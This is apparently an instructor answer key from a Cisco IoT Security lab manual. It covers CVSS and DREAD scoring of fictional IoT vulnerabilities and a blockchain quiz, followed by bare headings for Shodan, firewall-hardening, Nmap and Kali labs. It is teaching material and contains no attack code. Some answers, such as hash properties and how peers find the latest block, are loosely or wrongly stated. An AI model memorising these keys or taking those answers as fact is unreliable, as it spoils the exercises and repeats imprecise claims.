representing the severity and risk of a vulnerability.
The results of a CVSS calculation are based on metrics and formulas. The metrics are in three distinct
categories that can be quantitatively or qualitatively measured.
This lab will provide you with a security vulnerability scenario, and it will be your job to use the CVSS
calculator and specification document to determine what the Base Score is.
Required Resources
• PC or mobile device with Internet access
Part 1: Researching the Details of the CVSS Metrics Used to Compute the
CVSS Score
To use the CVSS risk assessment scoring system, it is important to understand each of the metrics that are
used in the calculation. The Forum of Incident Response and Security Teams (FIRST) has been designated
as the custodian of the CVSS to promote its adoption globally. Their specification document is very useful in
helping to understand each of the metrics. The following URL describes the metrics used when calculating a
CVSS score:
https://www.first.org/cvss/specification-document
a. Navigate to the CVSS specification document link provided above. Use this resource to answer the
questions below.
List the three metric groups and briefly describe each of them.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Base – represents the characteristics of a vulnerability that are constant over time and across contexts.
The Base metric is further broken down into the Exploitability and Impact metrics.
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Using the CVSS
Temporal – Measures the characteristics of a vulnerability that may change over time, but not across user
environments.
Environmental – This measures the aspects of a vulnerability that are rooted in a specific organization’s
environment.
What is the first metric used in the Base Metrics calculation? Describe the metric and all of the possible
values for this metric.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Attack Vector (AV) – Reflects the proximity of the threat to the vulnerable component. The more remote
the threat, the higher the severity.
Metric Value: Network – Vulnerable component is through OSI layer 3. This value implies that it is
remotely exploitable. Adjacent – Vulnerable component is through the network but is bound to the same
shared physical or logical network and cannot be accessed past a Layer 3 boundary (router). Local –
Attacker is likely logged in locally. Physical – the attacker must be able to physically touch or manipulate
the vulnerable component.
What is the difference between the High (H) and Low (L) values for the Attack Complexity (AC) metric?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The Low value indicates that specialized access conditions do not exist. An attacker can expect success
against the vulnerable component. The High value means that a successful attack depends on conditions
beyond the attacker’s control.
b. Read through the remaining metrics and their possible values for each of the components of for the Base
Metrics. Knowing where to find this information will be required for the next part of this lab.
Part 2: Using the CVSS Calculator to Determine the Severity Level of a

Vulnerability
Use the following scenario to determine the Base Score using the CVSS. Refer back to the CVSS
Specification document for the details regarding each of the required metrics used for this calculation.
Peter is a network manager for XYZ Corporation and has just documented a vulnerability with an IoT device.
XYZ Corp uses IoT devices in their manufacturing facility for monitoring and management of a wide variety of
equipment. During a security audit, a backdoor was discovered on an IoT device. Security logs indicate that
the IoT device has been routinely accessed remotely from outside of the company’s network. It appears that
the hackers can gain access whenever they would like without any required privileges to this IoT device. It
does not appear that any user interaction was required for this attack to occur. The scope of this vulnerability
is local. That is, no other components were impacted. The IoT device did not store or communicate any
confidential information and therefore, there was no loss of confidentiality with this vulnerability. However, the
attacker had access to information communicated to and from the device which appears to have been altered.
Although the attacker did not do anything to impact availability to this device, it does appear that the hackers
can take it offline.
Lab - Using the CVSS
For this part, we will use the CVSS Calculator from FIRST.org:
https://www.first.org/cvss/calculator/3.0
a. Navigate to the link for the calculator.
b. Select the appropriate values based on the description above for the Base Score.
What is the Base Score for the vulnerability described above?
____________________________________________________________________________________
____________________________________________________________________________________
Base Score: 9.1 (Critical) – CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Part 3: Reflecting on the Use and Results of the CVSS Calculator

Reflect on how each of these attacks should be handled to mitigate or minimize the impact? Do research as
necessary using the Internet.
a. How should an organization handle a vulnerability with this score?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
A score with a critical level usually indicates an immediate response.
b. Experiment with changing the values. What would happen if the Attack Vector required physical access?
How would this change the score?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The Base Score changes from 9.1 (Critical) to 6.1 (Medium).
c. Is it possible to select any combination of metrics that would result in a score greater than 0.0 if
Confidentiality, Integrity, and Availability had a value of “None”?
____________________________________________________________________________________
____________________________________________________________________________________
No.
Lab – Assess Risk with DREAD (Instructor Version)
Objectives
In this lab, you will use the DREAD risk assessment model to assess risk.
Part 1: Using the DREAD Scoring System to Assess Risk
Part 2: Using the DREAD System to Assess the Risk of a Described Vulnerability
Part 3: Reflecting on the Use of the DREAD Scoring System
DREAD is risk assessment model used to quantify risk related to security threats and to quantify potential
risks. It is not a vulnerability assessment tool, but it is part of the risk assessment. They differ because risks
are vulnerabilities that have been evaluated in the context of an organization based on previous attacks. The
same vulnerability may present vastly different levels of risk depending on the nature of the organization.
There are 5 categories used to compute the result:
o Damage Potential – If the threat is exploited, what is the damage potential?
o Reproducibility – How reproducible is the vulnerability?
o Exploitability – How difficult is it for the vulnerability to be exploited?
o Affected Users – What is the scale of the attack? How many users are affected by this vulnerability?
o Discoverability – How difficult is it to discover the attack?
There are multiple ways to score the DREAD risk assessment model. Microsoft uses a scoring system of 1, 2,
or 3 with 3 indicating the high risk for each category (STRIDE). However, for this lab, we will be using the
scoring system described by OWASP at the following link:
https://www.owasp.org/index.php/Threat_Risk_Modeling#DREAD
OWASP uses a scoring system of 0, 5, or 10 for each category with 10 indicating a more serious risk, and 0
indicating no risk. Discoverability is the only category that offers an additional option of 9. It is important to
refer back to this document when scoring each category for Part 1 of this lab.
Required Resources
Part 1: Using the DREAD Scoring System to Assess Risk

For this lab, use any news website or popular and reputable website that reports technology related news.
a. Navigate to the OWASP DREAD link: https://www.owasp.org/index.php/Threat_Risk_Modeling#DREAD
b. Read through the DREAD risk classification system and how to score each of the categories.
How would you score a threat that requires advanced programming and network knowledge to exploit it?
____________________________________________________________________________________
0
Lab – Assess Risk with DREAD
How would you score a threat that if exploited would cause complete system or data destruction?
____________________________________________________________________________________
10
How would you score a threat that anyone can find the details on how to exploit by using a search
engine?
____________________________________________________________________________________
9
Part 2: Using the DREAD System to Assess the Risk of a Described

Vulnerability
Use the following scenario to assess the risk of a threat using the DREAD risk assessment method. Refer
back to the OWASP DREAD link as needed for the details of how to score each category.
Jose is a security engineer for XYZ Corporation and has just discovered a threat with an IoT device. XYZ
Corp uses IoT devices in their manufacturing facility for monitoring and management of a wide variety of
equipment. Jose was searching the Internet for vulnerabilities for one of their IoT devices which indicated a
firmware vulnerability. The details of how to exploit this threat were clearly documented and it appears that
the exploit could cause the loss of individual user data. The exploit requires a couple of commands for any
authorized user who connects to this device. It appears that any web browser could be used to launch the
attack but if exploited it wouldn’t affect any users directly.
Indicate your score for each of the DREAD categories:
Damage Potential: _______________________________________________________________________
Reproducibility: _______________________________________________________________________
Exploitability: _______________________________________________________________________
Affected Users: _______________________________________________________________________
Discoverability: _______________________________________________________________________
D = 5, R = 5, E = 10, A = 0, D = 9
What is the Base Score for the vulnerability described above?
_______________________________________________________________________________________
DREAD Score: 5.8
Part 3: Reflecting on the Use of the DREAD Scoring System

How should an organization handle a threat with this score?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Considering the range is 0 to 10, a score of 5.8 is important to handle, but threats closer to 10 are more
serious and should be dealt with first.
How could this scoring system be improved?
_______________________________________________________________________________________
_______________________________________________________________________________________
Lab – Assess Risk with DREAD
Weighting could be implemented for each category. Numbers between 0 and 5 or 5 and 10 could be used for
each category to make it more granular.
What are some of the features or advantages of the DREAD system?
_______________________________________________________________________________________
_______________________________________________________________________________________
DREAD is very simple to use and understand. DREAD can be easily used to compare and prioritize risks in
order to determine which ones to handle first.
Lab – Blockchain Demo 2.0 (Instructor Version)
Objectives
Complete the Blockchain Demo 2.0
Complete Reflection Questions
Blockchain is the technology behind the cryptocurrency, bitcoin. It uses a distributed database to
cryptographically secure transaction. Blockchain transactions are immutable.
In this lab, you will complete the Blockchain Demo 2.0 created by freeCodeCamp and answer some questions
about this technological innovation.
Instructor Note: Students should still be able to complete this lab if the website link is broken or no longer
available.
Required Resources
• A computer with Internet access
Complete the Blockchain Demo 2.0

Go to either of the following websites to learn more about blockchain:
• Blockchain Demo 2.0
• freeCodeCamp Tutorial
Alternatively, you can answer the reflection questions by researching them on your own.
Reflection
1. What is the name of the first block created in a blockchain and what is its index value?
_______________________________________________________________________________________
_______________________________________________________________________________________
The first block is called the genesis block and its index value is 0.
2. List the six pieces of information stored in a block.
_______________________________________________________________________________________
_______________________________________________________________________________________
Each block includes the following information: index, timestamp, hash, previous hash, data, and nonce.
3. What is the purpose of the timestamp?
_______________________________________________________________________________________
_______________________________________________________________________________________
The timestamp is used to order the blockchain transactions.
Lab - Blockchain Demo 2.0
4. Describe the properties of the hash used in a blockchain.

_______________________________________________________________________________________
_______________________________________________________________________________________
Hash values have a fixed number of hexadecimal values. The same hash will always convert to the same
data. The hash is easy to compute but infeasible for a threat actor to convert to data. A small change the data
results in a big change in the hash.
5. Assume that f = hash function. Write the formula used to calculate the hash for the following block:
index = 5
previous hash = 000dc75a315c7...
timestamp = 1529514000
data = $1000.00
nonce = 714
_______________________________________________________________________________________
_______________________________________________________________________________________
f(5 + 000dc75a315c7 + 1529514000 + “$1000.00” + 714) = new hash
6. What is the purpose of the nonce?
_______________________________________________________________________________________
_______________________________________________________________________________________
The nonce is the number used to calculate a valid hash. This is the part of the hash function that consumes
the most processing power.
7. What are the four requirements a new block must meet in order to be valid?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
The four requirements for a valid block are as follows:
• The index value must be one greater than last block’s index.
• The previous hash value must be equal to last block’s hash.
• The block must meet the difficulty requirement.
• The block’s hash must be calculated correctly.
8. What type of global network does blockchain use?
_______________________________________________________________________________________
_______________________________________________________________________________________
Blockchain uses a peer-to-peer network.
9. How does a peer determine who has the most up-to-date blockchain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The peer with the longest valid chain of blocks takes precedent over all other peers.
 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com m
Lab - Blockchain Demo 2.0
10. How does a peer make sure all other peers have the latest and longest blockchain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The peer broadcasts its latest blocks to all its peers. The timestamp determines who has the latest block.
11. Why is blockchain considered immutable?
_______________________________________________________________________________________
_______________________________________________________________________________________
As more blocks are added to the blockchain, early blocks become harder to hack. The hacker would have to
mine faster than the rest of the network, which would take massive processing power. In addition, the hacker
would have to own 51% or more of the peers.
 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com m

IoTF Security v1.1 Instructor Lab Manual

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

IoTF Security v1.1 Instructor Lab Manual

Uploaded by

Copyright:

Available Formats

Internet of Things Fundamentals:

IoT Security v1.0

This document is exclusive property of Cisco Systems, Inc. Permission is granted

Part 1: Obtain Access to Shodan’s Free Features

Part 2: Investigate Connected IoT Devices

Step 1: Use the basic features of the Shodan search engine.

What string was used?

Part 1: Research Recent IoT Attacks

Part 2: Describe Mitigation Techniques

Part 1: Conduct Research for Home Automation Products

c. Record some examples of search terms you used to find products.

Part 2: Prepare a Presentation

Part 1: Research Risks for an Industry Sector

Part 2: Investigate the Potential Impact of a Security Breach

b. Is the security risk life threatening? In what way is safety impacted?

Part 3: Describe Security Measures for Your Industry Sector

 USB to µSD card reader

Part 1: Setting up the PL-App

Step 1: Download and Install the PL-App Launcher.

Step 2: Download and Install the PL-App Image.

Step 3: Set up a micro SD card with PL-App.

b. Obtain a µSD card that is at least 8 GB in size.

e. In this example, it is the D: drive.

Step 4: Configure the Image.

Part 2: Accessing PL-App on a Raspberry Pi on the Network

Appendix: Troubleshooting PL-App

Part 1: Setup the Lab Environment

Step 1: Download and Install Oracle VirtualBox.

Step 2: Connect the Network Topology

Part 2: Import the IoT Security Virtual Machines

Step 1: Import the virtual machine appliance into VirtualBox.

d. Repeat the import process for the Metasploitable VM.

Step 2: Verify Network Connectivity.

Step 3: Shut down the VMs.

Part 1: Securing Remote Access

Step 1: Access the Raspberry Pi remotely.

Step 2: Securing the user accounts

Step 3: Secure remote access.

#1) Respect the privacy of others.

[sudo] password for kingbob:

Part 2: Removing the Default Pi User Account

Step 2: Require a password with the command sudo.

Part 3: Configuring the Uncomplicated Firewall (UFW)

Step 1: Identify what network services are listening on the Pi.

Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-04 13:59 EDT

ESTAB 0 168 203.0.113.12:ssh 203.0.113.11:34730

Step 2: Check the status of the UFW.

Step 3: Configure firewall rules for the Uncomplicated Firewall (UFW).

Step 4: View the configured firewall rules for the UFW.

Step 5: Decrease the threat surface of SSH.

Step 6: Run Nmap and set scanning options.

Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-04 14:12 EDT

Nmap done: 1 IP address (1 host up) scanned in 121.88 seconds

Step 1: Restore the default user account.

Step 2: Disable UFW and restore defaults.

Backing up 'before.rules' to '/etc/ufw/before.rules.20181127_000859'

Step 3: Remove unnecessary users.

Part 1: Exploring Kali Linux

Step 1: Start the Kali VM.

Step 2: Explore Kali Linux.

Tool Category Interface (GUI or Command line)

Part 2: Investigating Nmap and Zenmap

Step 1: Learning about Nmap

Step 2: Learning about Zenmap